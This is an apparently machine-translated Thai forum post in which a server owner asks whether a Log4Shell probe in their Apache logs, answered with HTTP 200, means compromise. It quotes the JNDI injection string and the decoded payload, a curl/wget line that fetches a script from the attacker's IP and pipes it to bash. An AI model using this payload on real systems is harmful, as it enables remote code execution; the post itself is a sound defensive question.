ก่อนอื่น ขอขอบคุณล่วงหน้าและขออภัยหากฉันถามอะไรไร้สาระจริงๆ นี่ไม่ใช่ความเชี่ยวชาญของฉัน :)
ฉันมีเว็บเซิร์ฟเวอร์สำหรับทดสอบสิ่งต่างๆ เมื่อสัปดาห์ที่แล้วฉันตรวจสอบว่ามันเสี่ยงต่อ log4j CVE หรือไม่ และดูเหมือนว่ามีเพียง Jenkins เท่านั้นที่ใช้ร่องรอยของ log4j แต่อยู่ภายใน slf4j
(https://www.slf4j.org/log4shell.html) ซึ่งดูเหมือนจะไม่มีช่องโหว่ในเวอร์ชันนั้น
/var/lib/jenkins/plugins/ssh-slaves/WEB-INF/lib/log4j-over-slf4j-1.7.26.jar
ฉันอัปเดตทุกสิ่งที่ฉันสามารถทำได้เพื่อความปลอดภัย ฉันทิ้งไว้ที่นั่น แต่วันนี้ฉันยุ่งกับบันทึกของ apache และฉันเริ่มเห็นรายการเช่นนี้:
195.54.160.149 - - [26/Dec/2021:10:43:35 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/longbase64HERE} HTTP/ 1.1" 200 90
หมายเหตุ: base64 ที่แก้ไขเมื่อถอดรหัสแล้วมีลักษณะดังนี้:
(curl -s 195.54.160.149:5874/MYIP:443||wget -q -O- 195.54.160.149:5874/MYIP:443)|ทุบตี
ฉันรันสคริปต์หลายตัวเพื่อตรวจดูว่ามีร่องรอยของ log4j บนเซิร์ฟเวอร์ของฉันหรือไม่ แต่ดูเหมือนทุกอย่างจะชัดเจน
ฉันควรกังวลว่าเซิร์ฟเวอร์ตอบสนองด้วยรหัส 200 หรือไม่
ขอบคุณ